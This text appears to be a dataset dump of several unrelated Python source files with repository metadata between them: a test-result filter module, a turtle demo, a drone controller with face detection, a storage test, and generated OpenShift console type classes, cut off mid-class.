return [x for x in self.values if x.isActive()]
def getRequiredOptionsByAttribute(self, attr):
return self.attribute2Options.get(attr, super(IPETFilter, self).getRequiredOptionsByAttribute(attr))
def checkAndUpdateValueSet(self, dtype = None):
"""Update the value set of this filter if necessary
"""
if not self._updatevalueset:
return
self.valueset = set([x.getValue(dtype) for x in self.getActiveValues()])
updateset = set()
#
# check for test set names among the values
#
for i in self.valueset:
if i in TestSets.getTestSets():
logger.debug("Adding test set {} to value set".format(i))
updateset = updateset.union(set(TestSets.getTestSetByName(i)))
self.valueset = self.valueset.union(updateset)
logger.debug("Complete value set of filter {}:\n{}".format(self.getName(), self.valueset))
self._updatevalueset = False
def applyValueOperator(self, df):
dtype = df.dtypes[0]
self.checkAndUpdateValueSet(dtype)
contained = df.isin(self.valueset)
logger.debug("Contained: {}\nData: {}".format(contained, df))
if self.operator == "keep":
return contained
else:
return ~contained
def isAllDiff(self, x):
valueset = set()
for x_i in x:
if x_i in valueset:
return False
valueset.add(x_i)
return True
def isOneEqual(self, x):
return not self.isAllDiff(x)
def isAllEqual(self, x):
first_x = x.iloc[0]
for x_i in x:
if first_x != x_i:
return False
return True
def isOneDiff(self, x):
return not self.isAllEqual(x)
def applyListOperator(self, df, groupindex):
"""
Apply list operators 'diff' and 'equal' to the datakey.
In combination with the 'anytestrun' attribute, there are
four possibilities in total:
| anytestrun | operator | result |
|------------|----------|--------|
| one |diff |True, if there are at least 2 different values in a group |
| all |diff |True, if all values are different in this group |
| one |equal |True, if at least one value occurs twice in a group |
| all |equal |True, if there is only a single value for this group |
"""
#
        # 1. choose the right list function
#
if self.operator == "diff":
if self.anytestrun == "one":
fun = self.isOneDiff
else:
fun = self.isAllDiff
if self.operator == "equal":
if self.anytestrun == "one":
fun = self.isOneEqual
else:
fun = self.isAllEqual
#
# 2. store the original index
#
dfindex = df.set_index(groupindex).index
#
# 3. group by the index and apply the list function
#
f_by_group = df.groupby(groupindex)[self.datakey].apply(fun)
#
# 4. reindex the result to match the original data frame row count
#
f_by_group_as_frame = pd.DataFrame(f_by_group.reindex(index = dfindex, axis = 0))
#
# 5. set the index of the frame to match the original frame's index
#
f_by_group_as_frame.set_index(df.index, inplace = True)
return f_by_group_as_frame
def filterProblem(self, probname, testruns = []):
"""
return True or False depending on the evaluation of the filter operator comparison
"""
        # apply a value operator (keep/drop) directly to the problem name
if self.operator in self.valueoperators:
return self.applyValueOperator(probname)
# evaluate the two expressions and filter according to the anytestrun attribute if one or all match the requirement
for testrun in testruns:
x = self.evaluate(self.expression1, probname, testrun)
y = self.evaluate(self.expression2, probname, testrun)
if self.anytestrun == 'one' and self.comparison.compare(x, y):
return True
elif self.anytestrun == 'all' and not self.comparison.compare(x, y):
return False
if self.anytestrun == 'one':
return False
return True
def storeResult(self, df : pd.DataFrame, filtercol : pd.Series):
"""store a filter result for future reuse
"""
self._storeddf_ = df
self._storedcol_ = filtercol
def getStoredResult(self, df : pd.DataFrame):
"""return the already stored result for this data frame
"""
if self._storeddf_ is df:
return self._storedcol_
else:
return None
def applyFilter(self, df, groupindex = None):
"""Apply the filter to a data frame rowwise
Parameters
----------
df : DataFrame
data frame object containing columns 'expression1' and 'expression2' or 'datakey'
depending on the selected operator
groupindex : list or None
either a list of columns that should be used for groupby operations
(only needed for list operators 'equal' and 'diff')
Returns
-------
booleanseries :
"""
if self.operator in self.listoperators:
filtercol = self.applyListOperator(df, groupindex)
elif self.operator in self.valueoperators:
filtercol = self.applyValueOperator(df[[self.datakey]])
else:
x = self.evaluateValueDataFrame(df, self.expression1)
y = self.evaluateValueDataFrame(df, self.expression2)
try:
x.columns = ["comp"]
            except AttributeError:
                # x is a scalar (int, float or str) and has no 'columns' attribute
                pass
try:
y.columns = ["comp"]
            except AttributeError:
                pass
filtercol = self.comparison.compare(x, y)
if groupindex is None:
return filtercol
dfindex = df.set_index(groupindex).index
renaming = {i:"{}_filter".format(i) for i in groupindex}
filtercol = filtercol.rename(renaming, axis = 1)
filtercol.index = dfindex
# group the filter by the specified data frame index columns.
if self.anytestrun == "one":
func = np.any
elif self.anytestrun == "all":
func = np.all
fcol_index = filtercol.groupby(filtercol.index).apply(func)
#
# reshape the column to match the original data frame rows
#
fcol = fcol_index.reindex(index = dfindex, axis = 0)
return fcol
def getNeededColumns(self, df):
return [exp for exp in [self.expression1, self.expression2, self.datakey] if exp in df.columns]
def evaluateValueDataFrame(self, df, value):
if value in df.columns:
return df[[value]]
else:
for conversion in [int, float, str]:
try:
return conversion(value)
except ValueError:
pass
return value
def evaluate(self, value, probname, testrun):
if value in testrun.getKeySet():
return testrun.getProblemDataById(probname, value)
else:
for conversion in [int, float, str]:
try:
return conversion(value)
except ValueError:
pass
return value
def filterProblems(self, probnames, testruns = []):
return [self.filterProblem(probname, testruns) for probname in probnames]
def getFilteredList(self, probnames, testruns = []):
return [probname for probname in probnames if self.filterProblem(probname, testruns)]
def toXMLElem(self):
me = ElementTree.Element(IPETFilter.getNodeTag(), self.attributesToStringDict())
for value in self.values:
me.append(value.toXMLElem())
return me
def getDependency(self, i):
if i == 1:
value = self.expression1
else:
value = self.expression2
try:
float(value)
        except (ValueError, TypeError):
return value
return None
def equals(self, other):
"""Compare this and another filter for equality
"""
if not IpetNode.equals(self, other):
return False
if self.operator == other.operator:
if self.operator not in IPETFilter.valueoperators:
return True
if len(self.values) != len(other.values):
return False
for v1, v2 in zip(self.values, other.values):
if not v1.equals(v2):
return False
return True
class IPETFilterGroup(IpetNode):
"""
represents a list of filters, has a name attribute for quick tabular representation
a filter group collects
"""
nodetag = "FilterGroup"
attribute2options = {"filtertype":["union", "intersection"]}
editableAttributes = ["name", "filtertype"]
# global data frame and index that are reused for several filter groups
_glbdf_ = None
_glbindex_ = None
# intersection row index which can be shared across all filter groups of type "intersection"
_glbinterrows_ = None
def __init__(self, name = None, filtertype = "intersection", active = True):
"""
constructor for a filter group
Parameters:
----------
name : a suitable name for the filter group
filtertype : either 'union' or 'intersection'
active : True or "True" if this filter group should be active, False otherwise
"""
super(IPETFilterGroup, self).__init__(active)
self.name = name
self.filters = []
if filtertype not in ["intersection", "union"]:
raise ValueError("Error: filtertype <%s> must be either 'intersection' or 'union'" % filtertype)
self.filtertype = filtertype
def getEditableAttributes(self):
return super(IPETFilterGroup, self).getEditableAttributes() + self.editableAttributes
def getChildren(self):
return self.filters
def addChild(self, child):
self.addFilter(child)
def acceptsAsChild(self, child):
return child.__class__ is IPETFilter
def removeChild(self, child):
self.filters.remove(child)
@staticmethod
def getNodeTag():
return IPETFilterGroup.nodetag
def getRequiredOptionsByAttribute(self, attr):
return self.attribute2options.get(attr, super(IPETFilterGroup, self).getRequiredOptionsByAttribute(attr))
def addFilter(self, filter_):
"""
add a filter to the list of filters.
Parameters
----------
        filter_ : an instance of IPETFilter
"""
self.filters.append(filter_)
def getName(self):
return self.name
def getActiveFilters(self):
return [f for f in self.filters if f.isActive()]
@staticmethod
def setGlobalDataFrameAndIndex(df : pd.DataFrame, index):
"""Set global data frame and index for filtering, that will be reused by each filter group
"""
IPETFilterGroup._glbdf_ = df
IPETFilterGroup._glbindex_ = index
IPETFilterGroup._glbinterrows_ = IPETFilterGroup.computeIntersectionRows(df, index)
@staticmethod
def computeIntersectionRows(df : pd.DataFrame, index):
"""Compute intersection rows of a given data frame and index
Intersection rows denote a boolean index to define the subset of rows of the input frame
considered as "intersection" for filter groups that have the "intersection" type (which is the default).
The intersection row computation is slow and is reused across all
filter groups with the intersection type.
"""
logger.info("Computing rows for intersection groups")
dfindex = df.set_index(index).index
groups = df.groupby(index)
instancecount = groups.apply(len).max()
interrows = groups.apply(lambda x:len(x) == instancecount)
return interrows.reindex(dfindex)
def filterDataFrame(self, df, index):
"""
filters a data frame object as the intersection of all values that match the criteria defined by the filters
"""
activefilters = self.getActiveFilters()
# treat the special case to keep everything quickly
if len(activefilters) == 0 and self.filtertype == "union":
return df
        # first, get the highest number of index occurrences. A problem must occur this often to be kept in the intersection
if self.filtertype == "intersection":
if df is IPETFilterGroup._glbdf_:
intersection_index = IPETFilterGroup._glbinterrows_
else:
intersection_index = IPETFilterGroup.computeIntersectionRows(df, index)
elif self.filtertype == "union":
intersection_index = None
for f_ in activefilters:
# check first if the column has already been stored
storedcol = f_.getStoredResult(df)
if storedcol is not None:
fcol = storedcol
else:
# apply the filter to the data frame rowwise and store the result in a temporary boolean column
fcol = f_.applyFilter(df, index)
if intersection_index is not None:
intersection_index = intersection_index & fcol
else:
intersection_index = fcol
#
# aggregate the single, elementwise filters into a single intersection
# series with one row per index element
#
# intersection_index = pd.concat(index_series, axis = 1).apply(np.all, axis = 1)
lvalues = intersection_index.values
return lvalues
def filterProblem(self, probname, testruns = []):
for filter_ in self.getActiveFilters():
if not filter_.filterProblem(probname, testruns):
return False
return True
def getNeededColumns(self, df):
needed = []
for filter_ in self.filters:
needed += filter_.getNeededColumns(df)
return needed
def toXMLElem(self):
me = ElementTree.Element('FilterGroup', self.attributesToStringDict())
for filter_ in self.filters:
me.append(filter_.toXMLElem())
return me
@staticmethod
def processXMLElem(elem):
"""
inspect and process an xml element
"""
if elem.tag == IPETFilterGroup.getNodeTag():
filtergroup = IPETFilterGroup(**elem.attrib)
for child in elem:
filtergroup.addFilter(IPETFilterGroup.processXMLElem(child))
return filtergroup
elif elem.tag == IPETFilter.getNodeTag():
return IPETFilter.processXMLElem(elem)
@staticmethod
def fromXML(xmlstring):
"""
parse an xml string matching the filter group XML syntax
"""
tree = ElementTree.fromstring(xmlstring)
return IPETFilterGroup.processXMLElem(tree)
@staticmethod
def fromXMLFile(xmlfilename):
"""
parse a file containing an xml string matching the filter group XML representation syntax
"""
tree = ElementTree.parse(xmlfilename)
return IPETFilterGroup.processXMLElem(tree.getroot())
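# ---------------------------------------------------------------------------
# Minimal usage sketch (not part of the original module): it shows how a
# "keep" value filter could be applied to a plain pandas DataFrame. The column
# name "Status" and the sample data are made-up assumptions; only the
# IPETFilter/IPETValue API defined earlier in this module is used.
if __name__ == "__main__":
    example_df = pd.DataFrame({
        "ProblemName": ["p1", "p1", "p2", "p2"],
        "Status": ["ok", "fail", "ok", "ok"],
    })
    keep_ok = IPETFilter(operator="keep", datakey="Status")
    keep_ok.addChild(IPETValue("ok"))
    # applyFilter returns a boolean frame marking the rows whose 'Status'
    # value is contained in the filter's value set
    print(keep_ok.applyFilter(example_df))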
| 32.909465
| 187
| 0.605852
|
cec70524cb9b90ca20f49ec70b6193209fc3e3fb
| 184
|
py
|
Python
|
turtle/exemplo turtle.py
|
LC-ardovino/INFNET
|
3c485f122820f549f6a3c315fe09a537411bea7c
|
[
"MIT"
] | null | null | null |
turtle/exemplo turtle.py
|
LC-ardovino/INFNET
|
3c485f122820f549f6a3c315fe09a537411bea7c
|
[
"MIT"
] | null | null | null |
turtle/exemplo turtle.py
|
LC-ardovino/INFNET
|
3c485f122820f549f6a3c315fe09a537411bea7c
|
[
"MIT"
] | 1
|
2022-03-31T11:47:02.000Z
|
2022-03-31T11:47:02.000Z
|
import turtle
turtle.title("Welcome to the Python development course!")
turtle.shape("turtle")
distancia = int(input("Enter the distance for the turtle: "))
turtle.forward(distancia)
| 30.666667
| 61
| 0.782609
|
1c28da05f18750e69a4499fd9b9574f15d267cee
| 1,726
|
py
|
Python
|
src/primaires/objet/types/clef.py
|
stormi/tsunami
|
bdc853229834b52b2ee8ed54a3161a1a3133d926
|
[
"BSD-3-Clause"
] | null | null | null |
src/primaires/objet/types/clef.py
|
stormi/tsunami
|
bdc853229834b52b2ee8ed54a3161a1a3133d926
|
[
"BSD-3-Clause"
] | null | null | null |
src/primaires/objet/types/clef.py
|
stormi/tsunami
|
bdc853229834b52b2ee8ed54a3161a1a3133d926
|
[
"BSD-3-Clause"
] | null | null | null |
# -*-coding:Utf-8 -*
# Copyright (c) 2010 LE GOFF Vincent
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT
# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""Fichier contenant le type clef."""
from .base import BaseType
class Clef(BaseType):
"""Type d'objet: clef.
"""
nom_type = "clef"
| 41.095238
| 79
| 0.75956
|
cc44f245ecfa52f04753837ac46d0c1dfdd6c373
| 9,368
|
py
|
Python
|
drone/8_facedtect_webcamera/36_face_detect/droneapp/models/drone_manager.py
|
onselaydin/pytry
|
314aa50b6f8535e275dc8a2edd0c21637fb5a745
|
[
"Apache-2.0"
] | null | null | null |
drone/8_facedtect_webcamera/36_face_detect/droneapp/models/drone_manager.py
|
onselaydin/pytry
|
314aa50b6f8535e275dc8a2edd0c21637fb5a745
|
[
"Apache-2.0"
] | null | null | null |
drone/8_facedtect_webcamera/36_face_detect/droneapp/models/drone_manager.py
|
onselaydin/pytry
|
314aa50b6f8535e275dc8a2edd0c21637fb5a745
|
[
"Apache-2.0"
] | null | null | null |
import logging
import contextlib
import os
import socket
import subprocess
import threading
import time
import cv2 as cv
import numpy as np
from droneapp.models.base import Singleton
logger = logging.getLogger(__name__)
DEFAULT_DISTANCE = 0.30
DEFAULT_SPEED = 10
DEFAULT_DEGREE = 10
FRAME_X = int(960/3)
FRAME_Y = int(720/3)
FRAME_AREA = FRAME_X * FRAME_Y
FRAME_SIZE = FRAME_AREA * 3
FRAME_CENTER_X = FRAME_X / 2
FRAME_CENTER_Y = FRAME_Y / 2
CMD_FFMPEG = (f'ffmpeg -hwaccel auto -hwaccel_device opencl -i pipe:0 '
f'-pix_fmt bgr24 -s {FRAME_X}x{FRAME_Y} -f rawvideo pipe:1')
FACE_DETECT_XML_FILE = './droneapp/models/haarcascade_frontalface_default.xml'
class ErrorNoFaceDetectXMLFile(Exception):
"""Error no face detect xml file"""
class DroneManager(metaclass=Singleton):
def __init__(self, host_ip='192.168.10.2', host_port=8889,
drone_ip='192.168.10.1', drone_port=8889,
is_imperial=False, speed=DEFAULT_SPEED):
self.host_ip = host_ip
self.host_port = host_port
self.drone_ip = drone_ip
self.drone_port = drone_port
self.drone_address = (drone_ip, drone_port)
self.is_imperial = is_imperial
self.speed = speed
self.socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.socket.bind((self.host_ip, self.host_port))
self.response = None
self.stop_event = threading.Event()
self._response_thread = threading.Thread(target=self.receive_response,
args=(self.stop_event, ))
self._response_thread.start()
self.patrol_event = None
self.is_patrol = False
self._patrol_semaphore = threading.Semaphore(1)
self._thread_patrol = None
self.proc = subprocess.Popen(CMD_FFMPEG.split(' '),
stdin=subprocess.PIPE,
stdout=subprocess.PIPE)
self.proc_stdin = self.proc.stdin
self.proc_stdout = self.proc.stdout
self.video_port = 11111
self._receive_video_thread = threading.Thread(
target=self.receive_video,
args=(self.stop_event, self.proc_stdin,
self.host_ip, self.video_port,))
self._receive_video_thread.start()
if not os.path.exists(FACE_DETECT_XML_FILE):
raise ErrorNoFaceDetectXMLFile(f'No {FACE_DETECT_XML_FILE}')
self.face_cascade = cv.CascadeClassifier(FACE_DETECT_XML_FILE)
self._is_enable_face_detect = False
self.send_command('command')
self.send_command('streamon')
self.set_speed(self.speed)
def receive_response(self, stop_event):
while not stop_event.is_set():
try:
self.response, ip = self.socket.recvfrom(3000)
logger.info({'action': 'receive_response',
'response': self.response})
except socket.error as ex:
logger.error({'action': 'receive_response',
'ex': ex})
break
    def __del__(self):
self.stop()
def stop(self):
self.stop_event.set()
retry = 0
        while self._response_thread.is_alive():
time.sleep(0.3)
if retry > 30:
break
retry += 1
self.socket.close()
os.kill(self.proc.pid, 9)
# Windows
# import signal
# os.kill(self.proc.pid, signal.CTRL_C_EVENT)
def send_command(self, command):
logger.info({'action': 'send_command', 'command': command})
self.socket.sendto(command.encode('utf-8'), self.drone_address)
retry = 0
while self.response is None:
time.sleep(0.3)
if retry > 3:
break
retry += 1
if self.response is None:
response = None
else:
response = self.response.decode('utf-8')
self.response = None
return response
def takeoff(self):
return self.send_command('takeoff')
def land(self):
return self.send_command('land')
def move(self, direction, distance):
distance = float(distance)
if self.is_imperial:
distance = int(round(distance * 30.48))
else:
distance = int(round(distance * 100))
return self.send_command(f'{direction} {distance}')
def up(self, distance=DEFAULT_DISTANCE):
return self.move('up', distance)
def down(self, distance=DEFAULT_DISTANCE):
return self.move('down', distance)
def left(self, distance=DEFAULT_DISTANCE):
return self.move('left', distance)
def right(self, distance=DEFAULT_DISTANCE):
return self.move('right', distance)
def forward(self, distance=DEFAULT_DISTANCE):
return self.move('forward', distance)
def back(self, distance=DEFAULT_DISTANCE):
return self.move('back', distance)
def set_speed(self, speed):
return self.send_command(f'speed {speed}')
def clockwise(self, degree=DEFAULT_DEGREE):
return self.send_command(f'cw {degree}')
def counter_clockwise(self, degree=DEFAULT_DEGREE):
return self.send_command(f'ccw {degree}')
def flip_front(self):
return self.send_command('flip f')
def flip_back(self):
return self.send_command('flip b')
def flip_left(self):
return self.send_command('flip l')
def flip_right(self):
return self.send_command('flip r')
def patrol(self):
if not self.is_patrol:
self.patrol_event = threading.Event()
self._thread_patrol = threading.Thread(
target=self._patrol,
args=(self._patrol_semaphore, self.patrol_event,))
self._thread_patrol.start()
self.is_patrol = True
def stop_patrol(self):
if self.is_patrol:
self.patrol_event.set()
retry = 0
            while self._thread_patrol.is_alive():
time.sleep(0.3)
if retry > 300:
break
retry += 1
self.is_patrol = False
def _patrol(self, semaphore, stop_event):
is_acquire = semaphore.acquire(blocking=False)
if is_acquire:
logger.info({'action': '_patrol', 'status': 'acquire'})
with contextlib.ExitStack() as stack:
stack.callback(semaphore.release)
status = 0
while not stop_event.is_set():
status += 1
if status == 1:
self.up()
if status == 2:
self.clockwise(90)
if status == 3:
self.down()
if status == 4:
status = 0
time.sleep(5)
else:
logger.warning({'action': '_patrol', 'status': 'not_acquire'})
def receive_video(self, stop_event, pipe_in, host_ip, video_port):
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock_video:
sock_video.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock_video.settimeout(.5)
sock_video.bind((host_ip, video_port))
data = bytearray(2048)
while not stop_event.is_set():
try:
size, addr = sock_video.recvfrom_into(data)
# logger.info({'action': 'receive_video', 'data': data})
except socket.timeout as ex:
logger.warning({'action': 'receive_video', 'ex': ex })
time.sleep(0.5)
continue
except socket.error as ex:
logger.error({'action': 'receive_video', 'ex': ex})
break
try:
pipe_in.write(data[:size])
pipe_in.flush()
except Exception as ex:
logger.error({'action': 'receive_video', 'ex': ex})
break
def video_binary_generator(self):
while True:
try:
frame = self.proc_stdout.read(FRAME_SIZE)
except Exception as ex:
logger.error({'action': 'video_binary_generator', 'ex': ex})
continue
if not frame:
continue
            # np.fromstring is deprecated; frombuffer + copy keeps the frame writable
            frame = np.frombuffer(frame, np.uint8).copy().reshape(FRAME_Y, FRAME_X, 3)
yield frame
def enable_face_detect(self):
self._is_enable_face_detect = True
def disable_face_detect(self):
self._is_enable_face_detect = False
def video_jpeg_generator(self):
for frame in self.video_binary_generator():
if self._is_enable_face_detect:
if self.is_patrol:
self.stop_patrol()
gray = cv.cvtColor(frame, cv.COLOR_BGR2GRAY)
faces = self.face_cascade.detectMultiScale(gray, 1.3, 5)
for (x, y, w, h) in faces:
cv.rectangle(frame, (x, y), (x+w, y+h), (255, 0, 0), 2)
break
_, jpeg = cv.imencode('.jpg', frame)
jpeg_binary = jpeg.tobytes()
yield jpeg_binary
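# ---------------------------------------------------------------------------
# Minimal usage sketch (not part of the original module): it assumes a Tello
# drone is reachable at the default 192.168.10.1 address and that ffmpeg is on
# the PATH, since DroneManager opens the command socket and the video pipeline
# in its constructor.
if __name__ == "__main__":
    drone = DroneManager()
    try:
        drone.takeoff()
        time.sleep(5)
        drone.clockwise(90)
        drone.land()
    finally:
        drone.stop()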
| 32.19244
| 79
| 0.568638
|
2608581b7e83b8558c298c7d0b6b338364685ede
| 712
|
py
|
Python
|
qac/test/test_storage.py
|
jantrienes/ecir2019-qac
|
7d6dea5af85fc97d115cbf804365e04c8eed1111
|
[
"MIT"
] | 11
|
2019-03-06T06:49:10.000Z
|
2020-01-16T06:53:54.000Z
|
qac/test/test_storage.py
|
jantrienes/ecir2019-qac
|
7d6dea5af85fc97d115cbf804365e04c8eed1111
|
[
"MIT"
] | null | null | null |
qac/test/test_storage.py
|
jantrienes/ecir2019-qac
|
7d6dea5af85fc97d115cbf804365e04c8eed1111
|
[
"MIT"
] | 3
|
2019-04-26T06:49:20.000Z
|
2020-06-05T12:35:02.000Z
|
# pylint: disable=protected-access
from qac.storage import base
class TestStorage(object):
storage = base.Storage(db='stackexchange_test')
@classmethod
def setup_class(cls):
cls.storage._db['users'].delete_many({})
@classmethod
def teardown_class(cls):
cls.storage._db['users'].delete_many({})
def test_users(self):
assert not list(self.storage.users())
self.storage.add_user('john')
self.storage.add_user('jane')
users = list(self.storage.users())
assert len(users) == 2
assert len(list(filter(lambda u: u['name'] == 'john', users))) == 1
assert len(list(filter(lambda u: u['name'] == 'jane', users))) == 1
| 26.37037
| 75
| 0.622191
|
980f174acd23503df9eca5d886065699d610a75c
| 24,199
|
py
|
Python
|
kubespec/openshift/console/v1.py
|
machinezone/kubespec
|
0d493d8d834643968d7c852c561e6c634c8c1556
|
[
"BSD-3-Clause"
] | 7
|
2019-10-22T14:21:16.000Z
|
2021-03-18T15:57:41.000Z
|
kubespec/openshift/console/v1.py
|
machinezone/kubespec
|
0d493d8d834643968d7c852c561e6c634c8c1556
|
[
"BSD-3-Clause"
] | null | null | null |
kubespec/openshift/console/v1.py
|
machinezone/kubespec
|
0d493d8d834643968d7c852c561e6c634c8c1556
|
[
"BSD-3-Clause"
] | null | null | null |
# Code is generated: DO NOT EDIT
# Copyright 2019 Machine Zone, Inc. All rights reserved.
# Use of this source code is governed by a BSD-style
# license that can be found in the LICENSE file.
from kubespec import context
from kubespec import types
from kubespec.k8s import base
from kubespec.k8s.meta import v1 as metav1
from typeguard import check_type, typechecked
from typing import Any, Dict, List, Optional
# ConsoleLinkLocationSelector is a set of possible menu targets to which a link may be appended.
ConsoleLinkLocation = base.Enum(
"ConsoleLinkLocation",
{
# ApplicationMenu indicates that the link should appear inside the application menu of the console.
"ApplicationMenu": "ApplicationMenu",
# HelpMenu indicates that the link should appear in the help menu in the console.
"HelpMenu": "HelpMenu",
# NamespaceDashboard indicates that the link should appear in the namespaced dashboard of the console.
"NamespaceDashboard": "NamespaceDashboard",
# UserMenu indicates that the link should appear in the user menu in the console.
"UserMenu": "UserMenu",
},
)
# ConsoleNotificationLocationSelector is a set of possible notification targets
# to which a notification may be appended.
ConsoleNotificationLocation = base.Enum(
"ConsoleNotificationLocation",
{
# BannerBottom indicates that the notification should appear at the bottom of the console.
"BannerBottom": "BannerBottom",
# BannerTop indicates that the notification should appear at the top of the console.
"BannerTop": "BannerTop",
# BannerTopBottom indicates that the notification should appear both at the top and at the bottom of the console.
"BannerTopBottom": "BannerTopBottom",
},
)
# ConsoleYAMLSampleDescription of the YAML sample.
ConsoleYAMLSampleDescription = base.Enum("ConsoleYAMLSampleDescription", {})
# ConsoleYAMLSampleTitle of the YAML sample.
ConsoleYAMLSampleTitle = base.Enum("ConsoleYAMLSampleTitle", {})
# ConsoleYAMLSampleYAML is the YAML sample to display.
ConsoleYAMLSampleYAML = base.Enum("ConsoleYAMLSampleYAML", {})
class ApplicationMenuSpec(types.Object):
"""
ApplicationMenuSpec is the specification of the desired section and icon used for the link in the application menu.
"""
@context.scoped
@typechecked
def __init__(self, section: str = "", image_url: str = None):
super().__init__()
self.__section = section
self.__image_url = image_url
@typechecked
def _root(self) -> Dict[str, Any]:
v = super()._root()
section = self.section()
check_type("section", section, str)
v["section"] = section
image_url = self.image_url()
check_type("image_url", image_url, Optional[str])
if image_url: # omit empty
v["imageURL"] = image_url
return v
def section(self) -> str:
"""
section is the section of the application menu in which the link should appear.
This can be any text that will appear as a subheading in the application menu dropdown.
A new section will be created if the text does not match text of an existing section.
"""
return self.__section
def image_url(self) -> Optional[str]:
"""
imageUrl is the URL for the icon used in front of the link in the application menu.
The URL must be an HTTPS URL or a Data URI. The image should be square and will be shown at 24x24 pixels.
"""
return self.__image_url
class CLIDownloadLink(types.Object):
@context.scoped
@typechecked
def __init__(self, text: str = "", href: str = ""):
super().__init__()
self.__text = text
self.__href = href
@typechecked
def _root(self) -> Dict[str, Any]:
v = super()._root()
text = self.text()
check_type("text", text, str)
v["text"] = text
href = self.href()
check_type("href", href, str)
v["href"] = href
return v
def text(self) -> str:
"""
text is the display text for the link
"""
return self.__text
def href(self) -> str:
"""
href is the absolute secure URL for the link (must use https)
"""
return self.__href
class ConsoleCLIDownloadSpec(types.Object):
"""
ConsoleCLIDownloadSpec is the desired cli download configuration.
"""
@context.scoped
@typechecked
def __init__(
self,
display_name: str = "",
description: str = "",
links: List["CLIDownloadLink"] = None,
):
super().__init__()
self.__display_name = display_name
self.__description = description
self.__links = links if links is not None else []
@typechecked
def _root(self) -> Dict[str, Any]:
v = super()._root()
display_name = self.display_name()
check_type("display_name", display_name, str)
v["displayName"] = display_name
description = self.description()
check_type("description", description, str)
v["description"] = description
links = self.links()
check_type("links", links, List["CLIDownloadLink"])
v["links"] = links
return v
def display_name(self) -> str:
"""
displayName is the display name of the CLI download.
"""
return self.__display_name
def description(self) -> str:
"""
description is the description of the CLI download (can include markdown).
"""
return self.__description
def links(self) -> List["CLIDownloadLink"]:
"""
links is a list of objects that provide CLI download link details.
"""
return self.__links
class ConsoleCLIDownload(base.TypedObject, base.MetadataObject):
"""
ConsoleCLIDownload is an extension for configuring openshift web console command line interface (CLI) downloads.
"""
@context.scoped
@typechecked
def __init__(
self,
name: str = None,
labels: Dict[str, str] = None,
annotations: Dict[str, str] = None,
spec: "ConsoleCLIDownloadSpec" = None,
):
super().__init__(
api_version="console.openshift.io/v1",
kind="ConsoleCLIDownload",
**({"name": name} if name is not None else {}),
**({"labels": labels} if labels is not None else {}),
**({"annotations": annotations} if annotations is not None else {}),
)
self.__spec = spec if spec is not None else ConsoleCLIDownloadSpec()
@typechecked
def _root(self) -> Dict[str, Any]:
v = super()._root()
spec = self.spec()
check_type("spec", spec, "ConsoleCLIDownloadSpec")
v["spec"] = spec
return v
def spec(self) -> "ConsoleCLIDownloadSpec":
return self.__spec
class ConsoleExternalLogLinkSpec(types.Object):
"""
ConsoleExternalLogLinkSpec is the desired log link configuration.
The log link will appear on the logs tab of the pod details page.
"""
@context.scoped
@typechecked
def __init__(
self, text: str = "", href_template: str = "", namespace_filter: str = None
):
super().__init__()
self.__text = text
self.__href_template = href_template
self.__namespace_filter = namespace_filter
@typechecked
def _root(self) -> Dict[str, Any]:
v = super()._root()
text = self.text()
check_type("text", text, str)
v["text"] = text
href_template = self.href_template()
check_type("href_template", href_template, str)
v["hrefTemplate"] = href_template
namespace_filter = self.namespace_filter()
check_type("namespace_filter", namespace_filter, Optional[str])
if namespace_filter: # omit empty
v["namespaceFilter"] = namespace_filter
return v
def text(self) -> str:
"""
text is the display text for the link
"""
return self.__text
def href_template(self) -> str:
"""
hrefTemplate is an absolute secure URL (must use https) for the log link including
variables to be replaced. Variables are specified in the URL with the format ${variableName},
for instance, ${containerName} and will be replaced with the corresponding values
from the resource. Resource is a pod.
Supported variables are:
        - ${resourceName} - name of the resource which contains the logs
- ${resourceUID} - UID of the resource which contains the logs
- e.g. `11111111-2222-3333-4444-555555555555`
- ${containerName} - name of the resource's container that contains the logs
- ${resourceNamespace} - namespace of the resource that contains the logs
- ${resourceNamespaceUID} - namespace UID of the resource that contains the logs
- ${podLabels} - JSON representation of labels matching the pod with the logs
- e.g. `{"key1":"value1","key2":"value2"}`
e.g., https://example.com/logs?resourceName=${resourceName}&containerName=${containerName}&resourceNamespace=${resourceNamespace}&podLabels=${podLabels}
"""
return self.__href_template
def namespace_filter(self) -> Optional[str]:
"""
namespaceFilter is a regular expression used to restrict a log link to a
matching set of namespaces (e.g., `^openshift-`). The string is converted
into a regular expression using the JavaScript RegExp constructor.
If not specified, links will be displayed for all the namespaces.
"""
return self.__namespace_filter
class ConsoleExternalLogLink(base.TypedObject, base.MetadataObject):
"""
ConsoleExternalLogLink is an extension for customizing OpenShift web console log links.
"""
@context.scoped
@typechecked
def __init__(
self,
name: str = None,
labels: Dict[str, str] = None,
annotations: Dict[str, str] = None,
spec: "ConsoleExternalLogLinkSpec" = None,
):
super().__init__(
api_version="console.openshift.io/v1",
kind="ConsoleExternalLogLink",
